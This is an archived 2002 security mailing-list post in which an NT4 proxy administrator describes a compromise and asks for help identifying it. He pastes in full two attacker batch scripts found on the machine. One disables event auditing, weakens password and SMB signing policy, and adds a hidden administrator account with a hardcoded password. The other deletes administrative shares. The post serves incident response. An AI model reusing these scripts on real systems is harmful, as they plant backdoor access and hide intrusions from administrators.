Proxy server hit... Any ideas?

From: Mike Cain <mikec(at)lpinsurance.com>
Date: Mon Nov 18 2002 - 09:00:43 EST

Well, I have had my first run-in with a hacker, or was it a virus? I'm not 100% sure.. Guess I should start from the beginning...

A days ago, I began to get user complaints on the slowness of the internet. I figured it was mostly them just wanting something to complain about, so I did what all crappy admins do, I ignored it. Well, last night the box was rebooted after some software was updated. Today people were complaining about how PAINFULLY slow the internet was, so I looked at the proxy server. NT4 running proxy3. I know, there is newer better stuff, but its what I have to work with. :) SO... I looked at the processes and noticed the CPU hovering at 35-50%.. Way too high. So a quick look at the process list showed two things that I didn't remember needing to be there, win.exe and start.exe. Next move was to find them, and they were in the winnt\system\ folder. What I also found odd was that there were three new folders in that directory all created on the 8th, NT, tools, and win.

Here are the contents, respectively.
1. 1fg.dll, 1gno32.dll, 1s.dll, 1t.exe(antivirus sees this one as a backdoor Trojan), 132.dll, 1gn32.dll, 1idv32.dll, 1sf32.dll, 1ygwin1.dll (says it's a Cygwin POSIX Emulation DLL), 132.dll.bkup

2. temp, servUDaemon.ini, services.exe, servUStartUpLog.txt, in, srvss.exe, start.exe, BugSlayerUtil.dll (says it's a Bugslayer Utility Routine), and _zoLibr.dll

3. (folder) FL, cygwin.dll, MS.dll, secure.bat (see below), temp, x32.dll, cfg.dll, IGNo32.dll, secure1.bat (see below) pidv32.dll, win.exe, x32.dll.bkup

SO, anyone know what I have or what hit me? From looking at the sercure and secure1 batch files, it looks like a root kit... But I'mm new at this side of security I'mm aCiscoo guy...)

Last thing, the logs show that the attacker was hitting the \scripts\sample\ folder... Meaning I think he was trying to use the old IIS Sample Scripts to execute local code... Not sure if he was successful...

Thanks in advance!!

Mike Cain
CCNP/MCSE Secure.bat =
@echo off
del temp
echo Compiling New Security Policy ...
echo [Version] >> temp
echo signature="$CHICAGO$" >> temp
echo Revision=1 >> temp
echo [Profile Description] >> temp
echo Description=Default Security Settings. (Windows 2000 Professional)
>> temp

echo [System Access] >> temp
echo MinimumPasswordAge = 0 >> temp
echo MaximumPasswordAge = 42 >> temp
echo MinimumPasswordLength = 0 >> temp
echo PasswordComplexity = 0 >> temp
echo PasswordHistorySize = 0 >> temp
echo LockoutBadCount = 0 >> temp
echo RequireLogonToChangePassword = 0 >> temp echo ClearTextPassword = 0 >> temp
echo [Event Audit] >> temp

echo AuditSystemEvents = 0 >> temp
echo AuditLogonEvents = 0 >> temp
echo AuditObjectAccess = 0 >> temp
echo AuditPrivilegeUse = 0 >> temp
echo AuditPolicyChange = 0 >> temp

echo AuditAccountManage = 0 >> temp
echo AuditProcessTracking = 0 >> temp
echo AuditDSAccess = 0 >> temp
echo AuditAccountLogon = 0 >> temp
echo [Registry Values] >> temp
echo
machine\system\currentcontrolset\services\netlogon\parameters\signsecure channel=4,1 >> temp
echo
machine\system\currentcontrolset\services\netlogon\parameters\sealsecure channel=4,1 >> temp
echo
machine\system\currentcontrolset\services\netlogon\parameters\requirestr ongkey=4,0 >> temp
echo
machine\system\currentcontrolset\services\netlogon\parameters\requiresig norseal=4,0 >> temp
echo
machine\system\currentcontrolset\services\netlogon\parameters\disablepas swordchange=4,0 >> temp
echo
machine\system\currentcontrolset\services\lanmanworkstation\parameters\r equiresecuritysignature=4,0 >> temp
echo
machine\system\currentcontrolset\services\lanmanworkstation\parameters\e nablesecuritysignature=4,1 >> temp
echo
machine\system\currentcontrolset\services\lanmanworkstation\parameters\e nableplaintextpassword=4,0 >> temp
echo
machine\system\currentcontrolset\services\lanmanserver\parameters\requir esecuritysignature=4,0 >> temp
echo
machine\system\currentcontrolset\services\lanmanserver\parameters\enable securitysignature=4,0 >> temp
echo
machine\system\currentcontrolset\services\lanmanserver\parameters\enable forcedlogoff=4,1 >> temp
echo
machine\system\currentcontrolset\services\lanmanserver\parameters\autodi sconnect=4,15 >> temp
echo machine\system\currentcontrolset\control\session manager\protectionmode=4,1 >> temp
echo machine\system\currentcontrolset\control\session manager\memory management\clearpagefileatshutdown=4,0 >> temp echo machine\system\currentcontrolset\control\print\providers\lanman print services\servers\addprinterdrivers=4,0 >> temp echo machine\system\currentcontrolset\control\lsa\restrictanonymous=4,0
>> temp

echo
machine\system\currentcontrolset\control\lsa\lmcompatibilitylevel=4,0 >> temp
echo
machine\system\currentcontrolset\control\lsa\fullprivilegeauditing=3,0
>> temp

echo machine\system\currentcontrolset\control\lsa\crashonauditfail=4,0
>> temp

echo machine\system\currentcontrolset\control\lsa\auditbaseobjects=4,0
>> temp

echo
machine\software\microsoft\windows\currentversion\policies\system\shutdo wnwithoutlogon=4,1 >> temp
echo
machine\software\microsoft\windows\currentversion\policies\system\legaln oticetext=1, >> temp
echo
machine\software\microsoft\windows\currentversion\policies\system\legaln oticecaption=1, >> temp
echo
machine\software\microsoft\windows\currentversion\policies\system\dontdi splaylastusername=4,0 >> temp
echo machine\software\microsoft\windows
nt\currentversion\winlogon\scremoveoption=1,0 >> temp echo machine\software\microsoft\windows
nt\currentversion\winlogon\passwordexpirywarning=4,14 >> temp echo machine\software\microsoft\windows
nt\currentversion\winlogon\cachedlogonscount=1,10 >> temp echo machine\software\microsoft\windows
nt\currentversion\winlogon\allocatefloppies=1,0 >> temp echo machine\software\microsoft\windows
nt\currentversion\winlogon\allocatedasd=1,0 >> temp echo machine\software\microsoft\windows
nt\currentversion\winlogon\allocatecdroms=1,0 >> temp echo machine\software\microsoft\windows
nt\currentversion\setup\recoveryconsole\setcommand=4,0 >> temp echo machine\software\microsoft\windows
nt\currentversion\setup\recoveryconsole\securitylevel=4,0 >> temp echo [Privilege Rights] >> temp
echo seassignprimarytokenprivilege = >> temp echo seauditprivilege = >> temp
echo sebackupprivilege = *S-1-5-32-544,*S-1-5-32-551 >> temp echo sebatchlogonright = >> temp
echo sechangenotifyprivilege =
*S-1-5-32-544,*S-1-5-32-551,*S-1-5-32-547,*S-1-5-32-545,*S-1-1-0 >> temp echo secreatepagefileprivilege = *S-1-5-32-544 >> temp echo secreatepermanentprivilege = >> temp echo secreatetokenprivilege = >> temp
echo sedebugprivilege = *S-1-5-32-544 >> temp echo sedenybatchlogonright = >> temp
echo sedenyinteractivelogonright = >> temp echo sedenynetworklogonright = >> temp
echo sedenyservicelogonright = >> temp
echo seenabledelegationprivilege = >> temp echo seincreasebasepriorityprivilege = *S-1-5-32-544 >> temp echo seincreasequotaprivilege = *S-1-5-32-544 >> temp echo seinteractivelogonright =
*S-1-5-32-544,*S-1-5-32-551,*S-1-5-32-547,*S-1-5-32-545,*S-1-5-21-196040 8961-1637723038-1801674531-501 >> temp
echo seloaddriverprivilege = *S-1-5-32-544 >> temp echo selockmemoryprivilege = >> temp
echo semachineaccountprivilege = >> temp echo senetworklogonright = %1 >> temp
echo seprofilesingleprocessprivilege = *S-1-5-32-544,*S-1-5-32-547 >> temp
echo seremoteshutdownprivilege = *S-1-5-32-544 >> temp echo serestoreprivilege = *S-1-5-32-544,*S-1-5-32-551 >> temp

echo sesecurityprivilege = *S-1-5-32-544 >> temp
echo seservicelogonright = >> temp
echo seshutdownprivilege =

*S-1-5-32-544,*S-1-5-32-551,*S-1-5-32-547,*S-1-5-32-545 >> temp echo sesyncagentprivilege = >> temp

echo sesystemenvironmentprivilege = *S-1-5-32-544 >> temp
echo sesystemprofileprivilege = *S-1-5-32-544 >> temp
echo sesystemtimeprivilege = *S-1-5-32-544,*S-1-5-32-547 >> temp
echo setakeownershipprivilege = *S-1-5-32-544 >> temp

echo setcbprivilege = >> temp
echo seundockprivilege = *S-1-5-32-544,*S-1-5-32-547,*S-1-5-32-545 >> temp
echo Adding User %1 with the Password %2 ... net user /add slash 971985
echo Adding slash to the Local Administrator Group ... net localgroup administrators slash /add echo Loading New Security Policy ...
secedit.exe /configure /areas USER_RIGHTS /db C:\winnt\temp\temp.mdb /CFG temp
echo System is now secure.

Secure1.bat

net share /delete C$ /y > net.deld
net share /delete D$ /y >> net.deld
net share /delete E$ /y >> net.deld
net share /delete F$ /y >> net.deld
net share /delete G$ /y >> net.deld
net share /delete H$ /y >> net.deld
net share /delete I$ /y >> net.deld
net share /delete J$ /y >> net.deld
net share /delete K$ /y >> net.deld
net share /delete L$ /y >> net.deld
net share /delete M$ /y >> net.deld
net share /delete N$ /y >> net.deld
net share /delete O$ /y >> net.deld
net share /delete P$ /y >> net.deld
net share /delete Q$ /y >> net.deld
net share /delete R$ /y >> net.deld
net share /delete S$ /y >> net.deld
net share /delete T$ /y >> net.deld
net share /delete U$ /y >> net.deld
net share /delete V$ /y >> net.deld
net share /delete W$ /y >> net.deld
net share /delete X$ /y >> net.deld
net share /delete Y$ /y >> net.deld
net share /delete Z$ /y >> net.deld
net share /delete ADMIN$ /y >> net.deld

#net share /delete IPC$ /y >> net.deld
del net.deld

---

This list is provided by the SecurityFocus ARIS analyzer service. For more information on this free incident handling, management and tracking system please see: http://aris.securityfocus.com Received on Tue Nov 19 15:52:39 2002